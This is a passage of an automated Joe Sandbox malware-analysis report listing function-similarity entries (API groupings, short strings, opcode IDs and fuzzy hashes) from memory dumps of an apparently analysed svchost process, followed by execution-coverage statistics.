                                                  • Instruction Fuzzy Hash: 0851A439E14611A7E7A8EFA6E96861B73B0F389B80F104938DF4A43755DFB8C845CB00
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.3355105286.0000022F4B921000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
                                                  • Associated: 00000011.00000002.3354416817.0000022F4B920000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000011.00000002.3355926032.0000022F4B935000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000011.00000002.3356680592.0000022F4B940000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000011.00000002.3357400152.0000022F4B942000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000011.00000002.3358068813.0000022F4B949000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_22f4b920000_svchost.jbxd
                                                  Similarity
                                                  • API ID: CurrentThread
                                                  • String ID:
                                                  • API String ID: 2882836952-0
                                                  • Opcode ID: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
                                                  • Instruction ID: d0868c2d9cf30e478813b9fe480cab2c66c994ec008eb639b9f6d8edd7a6fe81
                                                  • Opcode Fuzzy Hash: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
                                                  • Instruction Fuzzy Hash: 4561CC3A929A4096F7E49FA5E56831BB7B1F388744F100535EB8D43BAADBBCC540CB00
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.3355105286.0000022F4B921000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
                                                  • Associated: 00000011.00000002.3354416817.0000022F4B920000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000011.00000002.3355926032.0000022F4B935000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000011.00000002.3356680592.0000022F4B940000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000011.00000002.3357400152.0000022F4B942000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000011.00000002.3358068813.0000022F4B949000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_22f4b920000_svchost.jbxd
                                                  Similarity
                                                  • API ID: CurrentProcessProtectVirtual$HandleModule
                                                  • String ID:
                                                  • API String ID: 1092925422-0
                                                  • Opcode ID: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
                                                  • Instruction ID: b3c1c112d2e11a003287798bdc41f0482b20c7cd380c6116318526b11c9f8f77
                                                  • Opcode Fuzzy Hash: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
                                                  • Instruction Fuzzy Hash: 60113A2AE08740A7FBA4AF61E55825A77B0FB49B80F140436DB4D037A9EBADC944C781
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.3355105286.0000022F4B921000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
                                                  • Associated: 00000011.00000002.3354416817.0000022F4B920000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000011.00000002.3355926032.0000022F4B935000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000011.00000002.3356680592.0000022F4B940000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000011.00000002.3357400152.0000022F4B942000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000011.00000002.3358068813.0000022F4B949000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_22f4b920000_svchost.jbxd
                                                  Similarity
                                                  • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                  • String ID: csm
                                                  • API String ID: 2395640692-1018135373
                                                  • Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                                  • Instruction ID: 7cb284ad2bbe1a30e649e4dd8f8e8b9c1cc85bb7e2b6f127796852b835166346
                                                  • Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                                  • Instruction Fuzzy Hash: D851D33AF01600AAEB98EF55E1A876E37A1EB54B88F048930DF494778AD7BCC845C700
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000003.1646195511.0000022F4B8F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000022F4B8F0000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_3_22f4b8f0000_svchost.jbxd
                                                  Similarity
                                                  • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                  • String ID: csm$csm
                                                  • API String ID: 3896166516-3733052814
                                                  • Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                                  • Instruction ID: 622ab557142c9faff67b5bb53c6bde86df1ea76d362581bbbeddfaa336dc5a18
                                                  • Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                                  • Instruction Fuzzy Hash: 9651A63AA00340D6EBB4AF91E248B5A77B0F394B9AF144135DB4947BD6EBB8C453CB01
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.3355105286.0000022F4B921000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
                                                  • Associated: 00000011.00000002.3354416817.0000022F4B920000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000011.00000002.3355926032.0000022F4B935000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000011.00000002.3356680592.0000022F4B940000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000011.00000002.3357400152.0000022F4B942000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000011.00000002.3358068813.0000022F4B949000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_22f4b920000_svchost.jbxd
                                                  Similarity
                                                  • API ID: CallEncodePointerTranslator
                                                  • String ID: MOC$RCC
                                                  • API String ID: 3544855599-2084237596
                                                  • Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                                  • Instruction ID: 2519287d322944cfd7feb94d4905a80ad8ecedd1afd163043e9b4c01a4f3e364
                                                  • Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                                  • Instruction Fuzzy Hash: 5A61C13BD04BC491EBA8AF55E55539AB7B0F794B94F044A35EB8813B96CBBCC091CB00
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.3355105286.0000022F4B921000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
                                                  • Associated: 00000011.00000002.3354416817.0000022F4B920000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000011.00000002.3355926032.0000022F4B935000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000011.00000002.3356680592.0000022F4B940000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000011.00000002.3357400152.0000022F4B942000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000011.00000002.3358068813.0000022F4B949000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_22f4b920000_svchost.jbxd
                                                  Similarity
                                                  • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                  • String ID: csm$csm
                                                  • API String ID: 3896166516-3733052814
                                                  • Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                                  • Instruction ID: c13a4aa0f0c44daca869980378c499b26511675fa44cc9a95517fb1184cc627c
                                                  • Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                                  • Instruction Fuzzy Hash: 5C518E3BD00740ABFBA8AFA1D66835A77B0E354B94F1449359B8947B96C7BCC452CB01
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.3355105286.0000022F4B921000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
                                                  • Associated: 00000011.00000002.3354416817.0000022F4B920000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000011.00000002.3355926032.0000022F4B935000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000011.00000002.3356680592.0000022F4B940000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000011.00000002.3357400152.0000022F4B942000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000011.00000002.3358068813.0000022F4B949000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_22f4b920000_svchost.jbxd
                                                  Similarity
                                                  • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                  • String ID: pid_
                                                  • API String ID: 517849248-4147670505
                                                  • Opcode ID: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
                                                  • Instruction ID: ab322a2d4964e99f23f1116aef8ef54fab78dd75f398024ce987d62f44f25bf3
                                                  • Opcode Fuzzy Hash: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
                                                  • Instruction Fuzzy Hash: B411A519F14B81B2FB94AFA5EA2939B63B4F748740F8108319B4D83696EFACC915C700
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.3355105286.0000022F4B921000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
                                                  • Associated: 00000011.00000002.3354416817.0000022F4B920000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000011.00000002.3355926032.0000022F4B935000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000011.00000002.3356680592.0000022F4B940000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000011.00000002.3357400152.0000022F4B942000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000011.00000002.3358068813.0000022F4B949000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_22f4b920000_svchost.jbxd
                                                  Similarity
                                                  • API ID: FileWrite$ConsoleErrorLastOutput
                                                  • String ID:
                                                  • API String ID: 2718003287-0
                                                  • Opcode ID: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
                                                  • Instruction ID: 65ab33f9e86a3793016190f554dd470263d197bad517fea0e7f9cd5ea5b1132a
                                                  • Opcode Fuzzy Hash: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
                                                  • Instruction Fuzzy Hash: 98D1FF36B14A80A9EB94DFA5D6683DE37B1F349B98F405236CF4D97B9ADA74C006C340
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.3355105286.0000022F4B921000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
                                                  • Associated: 00000011.00000002.3354416817.0000022F4B920000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000011.00000002.3355926032.0000022F4B935000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000011.00000002.3356680592.0000022F4B940000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000011.00000002.3357400152.0000022F4B942000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000011.00000002.3358068813.0000022F4B949000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_22f4b920000_svchost.jbxd
                                                  Similarity
                                                  • API ID: Heap$Process$Free
                                                  • String ID:
                                                  • API String ID: 3168794593-0
                                                  • Opcode ID: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
                                                  • Instruction ID: 56e8b8fcdf47366c570304169e9c02a7fee4cc887c1613258ea6998d8deb5e52
                                                  • Opcode Fuzzy Hash: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
                                                  • Instruction Fuzzy Hash: 01015736A10B90EAE794EFE6E92814A77B1F78CF80B099035DF4943729DE78D461C740
                                                  APIs
                                                  • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000,0000022F4B9328DF), ref: 0000022F4B932A12
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.3355105286.0000022F4B921000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
                                                  • Associated: 00000011.00000002.3354416817.0000022F4B920000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000011.00000002.3355926032.0000022F4B935000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000011.00000002.3356680592.0000022F4B940000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000011.00000002.3357400152.0000022F4B942000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000011.00000002.3358068813.0000022F4B949000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_22f4b920000_svchost.jbxd
                                                  Similarity
                                                  • API ID: ConsoleMode
                                                  • String ID:
                                                  • API String ID: 4145635619-0
                                                  • Opcode ID: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
                                                  • Instruction ID: a05a13cbd6c50fc86814b52849a412da34fb816029a598fb177ae6ce372f8a44
                                                  • Opcode Fuzzy Hash: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
                                                  • Instruction Fuzzy Hash: 1791F63AE10654A5FF98AFA5D6783AE3BB0F34DB88F546139DF0A53686CAB4C445C300
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.3355105286.0000022F4B921000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
                                                  • Associated: 00000011.00000002.3354416817.0000022F4B920000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000011.00000002.3355926032.0000022F4B935000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000011.00000002.3356680592.0000022F4B940000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000011.00000002.3357400152.0000022F4B942000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000011.00000002.3358068813.0000022F4B949000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_22f4b920000_svchost.jbxd
                                                  Similarity
                                                  • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                  • String ID:
                                                  • API String ID: 2933794660-0
                                                  • Opcode ID: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
                                                  • Instruction ID: 7315c7c0fdf0fd24ccb5326225aca3ef93bf920e04fc4ac136ff2fecd1a1c651
                                                  • Opcode Fuzzy Hash: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
                                                  • Instruction Fuzzy Hash: 64115E2AB10F009AEB80DFA0E9683A933B4F71D758F441E31DB6D427A5DBB8C194C340
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.3355105286.0000022F4B921000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
                                                  • Associated: 00000011.00000002.3354416817.0000022F4B920000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000011.00000002.3355926032.0000022F4B935000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000011.00000002.3356680592.0000022F4B940000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000011.00000002.3357400152.0000022F4B942000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000011.00000002.3358068813.0000022F4B949000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_22f4b920000_svchost.jbxd
                                                  Similarity
                                                  • API ID: FileType
                                                  • String ID: \\.\pipe\
                                                  • API String ID: 3081899298-91387939
                                                  • Opcode ID: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
                                                  • Instruction ID: 69b0edfe0cb17288d0b0df2ba938852f381a9f43c30d0951323d7d8a6a24af5e
                                                  • Opcode Fuzzy Hash: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
                                                  • Instruction Fuzzy Hash: 0071832AE04B4165FFBCAEA6DA683AB77B4F345784F510836DF0947B96DAB8C500C740
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000003.1646195511.0000022F4B8F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000022F4B8F0000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_3_22f4b8f0000_svchost.jbxd
                                                  Similarity
                                                  • API ID: CurrentImageNonwritable__except_validate_context_record
                                                  • String ID: csm
                                                  • API String ID: 3242871069-1018135373
                                                  • Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                                  • Instruction ID: 9d5e0100f5ffe4596352da2ba97978141a35c5f3890224abb4ce1ccde644c2fd
                                                  • Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                                  • Instruction Fuzzy Hash: A951D23AB11A05EADB94EF95D54CF6E33B1F344B89F1542319B464778AE7B8D882C700
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000003.1646195511.0000022F4B8F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000022F4B8F0000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_3_22f4b8f0000_svchost.jbxd
                                                  Similarity
                                                  • API ID: CallTranslator
                                                  • String ID: MOC$RCC
                                                  • API String ID: 3163161869-2084237596
                                                  • Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                                  • Instruction ID: eb72844637493c4f102b5757175871491ca948ddf3b39f32b9f3a56f7479e12c
                                                  • Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                                  • Instruction Fuzzy Hash: FE61C236904BC491DBB0AF55E544B9AB7B0F795BC9F144235EB9807B96EBBCC091CB00
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.3355105286.0000022F4B921000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
                                                  • Associated: 00000011.00000002.3354416817.0000022F4B920000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000011.00000002.3355926032.0000022F4B935000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000011.00000002.3356680592.0000022F4B940000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000011.00000002.3357400152.0000022F4B942000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000011.00000002.3358068813.0000022F4B949000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_22f4b920000_svchost.jbxd
                                                  Similarity
                                                  • API ID: FileType
                                                  • String ID: \\.\pipe\
                                                  • API String ID: 3081899298-91387939
                                                  • Opcode ID: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
                                                  • Instruction ID: dff5c28ae23f6fb28725aba5b6bbbfb6d753e5a829e45e780184bca63f5c3eae
                                                  • Opcode Fuzzy Hash: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
                                                  • Instruction Fuzzy Hash: 5451E62AE0878061FEACAEA5E66C3AB7775F394740F040835CF4943B6ADABDD400CB40
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.3355105286.0000022F4B921000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
                                                  • Associated: 00000011.00000002.3354416817.0000022F4B920000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000011.00000002.3355926032.0000022F4B935000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000011.00000002.3356680592.0000022F4B940000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000011.00000002.3357400152.0000022F4B942000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000011.00000002.3358068813.0000022F4B949000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_22f4b920000_svchost.jbxd
                                                  Similarity
                                                  • API ID: ErrorFileLastWrite
                                                  • String ID: U
                                                  • API String ID: 442123175-4171548499
                                                  • Opcode ID: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
                                                  • Instruction ID: 27cf9f434496b3bd170b431ba0fea5b332a09b693fd3e9a843dce89e3fca500e
                                                  • Opcode Fuzzy Hash: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
                                                  • Instruction Fuzzy Hash: 61411636A25A80A6EB90EFA5E55879BB7B0F34C784F401032EF4D87759EBB8C441CB40
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.3355105286.0000022F4B921000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
                                                  • Associated: 00000011.00000002.3354416817.0000022F4B920000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000011.00000002.3355926032.0000022F4B935000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000011.00000002.3356680592.0000022F4B940000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000011.00000002.3357400152.0000022F4B942000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000011.00000002.3358068813.0000022F4B949000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_22f4b920000_svchost.jbxd
                                                  Similarity
                                                  • API ID: ExceptionFileHeaderRaise
                                                  • String ID: csm
                                                  • API String ID: 2573137834-1018135373
                                                  • Opcode ID: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
                                                  • Instruction ID: 7368844f5f46a0da056b2b14b5b0993db77552c27402f613873d14bbf342e81d
                                                  • Opcode Fuzzy Hash: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
                                                  • Instruction Fuzzy Hash: 08117936A04B8092EBA49F15F51824AB7E1F798B84F188634EF8D07B66DF7CC551CB00
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.3355105286.0000022F4B921000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
                                                  • Associated: 00000011.00000002.3354416817.0000022F4B920000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000011.00000002.3355926032.0000022F4B935000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000011.00000002.3356680592.0000022F4B940000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000011.00000002.3357400152.0000022F4B942000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000011.00000002.3358068813.0000022F4B949000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_22f4b920000_svchost.jbxd
                                                  Similarity
                                                  • API ID: Heap$Process$AllocFree
                                                  • String ID:
                                                  • API String ID: 756756679-0
                                                  • Opcode ID: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
                                                  • Instruction ID: d2d243e1f4da33dff666983cb4b4fc9292e00df8db3f46f6f3574d3ee2618496
                                                  • Opcode Fuzzy Hash: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
                                                  • Instruction Fuzzy Hash: 7B115A29A01B9091EA94EFA6E52815A67B0E78CFC0F589034DF4A57726DEB8D452C300
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.3355105286.0000022F4B921000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
                                                  • Associated: 00000011.00000002.3354416817.0000022F4B920000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000011.00000002.3355926032.0000022F4B935000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000011.00000002.3356680592.0000022F4B940000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000011.00000002.3357400152.0000022F4B942000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000011.00000002.3358068813.0000022F4B949000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_22f4b920000_svchost.jbxd
                                                  Similarity
                                                  • API ID: Heap$AllocProcess
                                                  • String ID:
                                                  • API String ID: 1617791916-0
                                                  • Opcode ID: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
                                                  • Instruction ID: b3e4a5b6f9333f152bb267859d7de1761df9f28d76ce986ecf85fb72ba9be1be
                                                  • Opcode Fuzzy Hash: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
                                                  • Instruction Fuzzy Hash: A4E03935A01604AAE794AFA2D82834A36E1EB8CB05F44D034CA0907351EFBDC899C740
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.3355105286.0000022F4B921000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
                                                  • Associated: 00000011.00000002.3354416817.0000022F4B920000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000011.00000002.3355926032.0000022F4B935000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000011.00000002.3356680592.0000022F4B940000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000011.00000002.3357400152.0000022F4B942000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000011.00000002.3358068813.0000022F4B949000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_22f4b920000_svchost.jbxd
                                                  Similarity
                                                  • API ID: Heap$AllocProcess
                                                  • String ID:
                                                  • API String ID: 1617791916-0
                                                  • Opcode ID: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
                                                  • Instruction ID: e58150afabff5c1ea00ebf14978d6c6d839fdce1e2f42293329f13860d5d1706
                                                  • Opcode Fuzzy Hash: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
                                                  • Instruction Fuzzy Hash: 4DE0ED75A11604AAE798AFA2D92825A76B1FB8CB15F44D034CA0907311EEB88899D710

                                                  Execution Graph

                                                  Execution Coverage:1.4%
                                                  Dynamic/Decrypted Code Coverage:100%
                                                  Signature Coverage:0%
                                                  Total number of Nodes:111
                                                  Total number of Limit Nodes:17
